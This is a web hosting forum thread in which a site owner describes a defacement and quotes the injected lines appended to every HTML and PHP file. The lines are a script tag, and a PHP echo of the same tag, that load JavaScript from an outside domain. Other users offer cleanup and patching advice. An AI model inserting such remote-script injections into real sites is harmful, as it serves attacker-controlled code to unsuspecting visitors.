defaced

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Spaceman-Spiff
    Junior Member
    • Apr 2004
    • 10

    defaced

    One site that i'm hosting got defaced today. I haven't found out yet how the intruder got in. I can only guess it's from older/unupdated scripts or programs.
    Anyway, the intruder changed the front page (which is easy to fix), and edited every single html and .php files (which will take hours to fix).

    The following code is added to the end of every .html files:
    Code:
    <script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>
    And the following code is added to the end of every .php files:
    Code:
    <? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>
    Unfortunately the website is a pretty large one. I spent 5 hours already checking hundreds of files and upgrading a few softwares, and still got more to go. Hope no one else gets hit...

    PS: I already deleted the defaced index and forgot to save a copy, so I can't say who/which group did it.
  • james
    Senior Member
    • Mar 2004
    • 183

    #2
    I'm assuming you changed your passwords straight away afterwards?

    Comment

    • Spaceman-Spiff
      Junior Member
      • Apr 2004
      • 10

      #3
      Originally posted by james
      I'm assuming you changed your passwords straight away afterwards?
      Yup, first thing I did.

      Now still in the process of downloading all html and php files, removing the code, and reuploading. Won't get much sleep today.

      Comment

      • james
        Senior Member
        • Mar 2004
        • 183

        #4
        You should use a text editor that supports search and replace over multiple files.

        It might speed up your job quite a bit.

        Comment

        • Spaceman-Spiff
          Junior Member
          • Apr 2004
          • 10

          #5
          Originally posted by james
          You should use a text editor that supports search and replace over multiple files.

          It might speed up your job quite a bit.
          Yup, I'm using JCreator to do that. Thanks anyways for the suggestion.

          Comment

          • Frank Hagan
            Senior Member
            • Mar 2004
            • 724

            #6
            I know that happened to sites running phpBB prior to version 2.0.15 (they are now at 2.0.18).

            Comment

            • samsam
              Member
              • Mar 2004
              • 79

              #7
              I found it interesting the other day to do a filtered search (using a few IP addresses that correspond to various Dathorn servers) on the ZoneH defacement archive at:



              It certainly looks like you have not been alone, Spaceman-Spiff, in getting defaced.

              But it seems my particular Dathorn server at least hasn't had a recorded defacement for a while, which is just a tad comforting.

              BTW, ZoneH has a alert service you can subscribe to, if you want to get an email when/if one of your sites gets listed on ZoneH. Handy, potentially.

              Sam

              Comment

              Working...